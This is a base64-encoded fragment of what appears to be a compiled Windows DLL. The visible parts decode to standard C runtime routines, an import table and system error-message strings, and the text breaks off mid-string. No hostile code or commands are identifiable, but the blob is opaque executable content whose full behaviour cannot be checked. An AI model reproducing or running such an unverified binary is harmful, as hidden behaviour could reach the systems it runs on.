i0YEOwWMfgEQdAdQ6C94//9Zi0YIOwWQfgEQdAdQ6B14//9Zi0YwOwW4fgEQdAdQ6At4//9Zi0Y0OwW8fgEQdAdQ6Pl3//9ZXl3DVYvsVot1CIX2D4RuAwAA/3YE6N53////dgjo1nf///92DOjOd////3YQ6MZ3////dhTovnf///92GOi2d////zbor3f///92IOind////3Yk6J93////dijol3f///92LOiPd////3Yw6Id3////djTof3f///92HOh3d////3Y46G93////djzoZ3f//4PEQP92QOhcd////3ZE6FR3////dkjoTHf///92TOhEd////3ZQ6Dx3////dlToNHf///92WOgsd////3Zc6CR3////dmDoHHf///92ZOgUd////3Zo6Ax3////dmzoBHf///92cOj8dv///3Z06PR2////dnjo7Hb///92fOjkdv//g8RA/7aAAAAA6NZ2////toQAAADoy3b///+2iAAAAOjAdv///7aMAAAA6LV2////tpAAAADoqnb///+2lAAAAOifdv///7aYAAAA6JR2////tpwAAADoiXb///+2oAAAAOh+dv///7akAAAA6HN2////tqgAAADoaHb///+2uAAAAOhddv///7a8AAAA6FJ2////tsAAAADoR3b///+2xAAAAOg8dv///7bIAAAA6DF2//+DxED/tswAAADoI3b///+2tAAAAOgYdv///7bUAAAA6A12////ttgAAADoAnb///+23AAAAOj3df///7bgAAAA6Ox1////tuQAAADo4XX///+26AAAAOjWdf///7bQAAAA6Mt1////tuwAAADowHX///+28AAAAOi1df///7b0AAAA6Kp1////tvgAAADon3X///+2/AAAAOiUdf///7YAAQAA6Il1////tgQBAADofnX//4PEQP+2CAEAAOhwdf///7YMAQAA6GV1////thABAADoWnX///+2FAEAAOhPdf///7YYAQAA6ER1////thwBAADoOXX///+2IAEAAOgudf///7YkAQAA6CN1////tigBAADoGHX///+2LAEAAOgNdf///7YwAQAA6AJ1////tjQBAADo93T///+2OAEAAOjsdP///7Y8AQAA6OF0////tkABAADo1nT///+2RAEAAOjLdP//g8RA/7ZIAQAA6L10////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/P7////oCgAAAIvH6yiLdQiLfeRW6PjS//9Zw+iMXP//iRjouVz//8cACQAAAOgpWf//g8j/6LdL///DVYvsVleLfQhX6GHS//9Zg/j/dFChEIcBEIP/AXUJ9oCEAAAAAXULg/8CdRz2QEQBdBZqAug20v//agGL8Ogt0v//WVk7xnQcV+gh0v//WVD/FaQAARCFwHUK/xUcAAEQi/DrAjP2V+h90f//WYvPg+cfwfkFwecGiwyNEIcBEMZEOQQAhfZ0DFbo9lv//1mDyP/rAjPAX15dw1WL7FaLdQj2RgyDdCD2RgwIdBr/dgjoH03//4FmDPf7//8zwFmJBolGCIlGBF5dw8zMzMzMzMz/JVgAARD/JWAAARDMzMzMi1QkCI1CDItK5DPI6I8q//+48FsBEOnvQP//i1QkCI1CDItK7DPI6HQq//+4mF8BEOnUQP//zMzMzMzMzMzMzMcF6IEBEAgPARDDzMzMzMzHBfCBARAIDwEQw8zMzMzMxwXsgQEQCA8BEMMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALxkAQCoZAEAkGQBANJkAQAAAAAAImQBAC5kAQBCZAEAFGQBAGJkAQBqZAEAdmQBANhoAQDoaAEA+GgBAFJkAQCwZgEA+mQBAAplAQAaZQEALGUBAEJlAQBUZQEAYGUBAHRlAQCQZQEAnmUBALRlAQDGZQEA3GUBAPJlAQD+ZQEACmYBABZmAQAmZgEAOGYBAEhmAQBWZgEAbmYBAIBmAQCWZgEADGkBAMZmAQDgZgEA+mYBABRnAQAwZwEATmcBAHZnAQCKZwEAlmcBAKRnAQCyZwEAvGcBANBnAQDoZwEAAGgBABZoAQAoaAEAOmgBAERoAQBQaAEAXGgBAGpoAQB6aAEAimgBAJxoAQCwaAEAxmgBAAAAAAD4YwEA1mMBAMBjAQAAAAAAAAAAAAAQABAQEAAQIBAAEAAAAAAAAAAA9CkAEBw9ABAMhgAQMJUAEAAAAAAAAAAAL9IAEO/0ABCjlQAQAAAAAAAAAAAAAAAAAAAAAOTo+1IAAAAAAgAAAG4AAADoVwEA6EUBAAAAAADk6PtSAAAAAAwAAAAUAAAAWFgBAFhGAQBhZGRyZXNzIG5vdCBhdmFpbGFibGUAAABhbHJlYWR5IGNvbm5lY3RlZAAAAGFyZ3VtZW50IGxpc3QgdG9vIGxvbmcAAGFyZ3VtZW50IG91dCBvZiBkb21haW4AAGJhZCBhZGRyZXNzAGJhZCBmaWxlIGRlc2NyaXB0b3IAYmFkIG1lc3NhZ2UAYnJva2VuIHBpcGUAY29ubmVjdGlvbiBhYm9ydGVkAABjb25uZWN0aW9uIGFscmVhZHkgaW4gcHJvZ3Jlc3MAAGNvbm5lY3Rpb24gcmVmdXNlZAAAY29ubmVjdGlvbiByZXNldAAAAABkZXN0aW5hdGlvbiBhZGRyZXNzIHJlcXVpcmVkAAAAAGV4ZWN1dGFibGUgZm9ybWF0IGVycm9yAGZpbGUgdG9vIGxhcmdlAABob3N0IHVucmVhY2hhYmxlAAAAAGlkZW50aWZpZ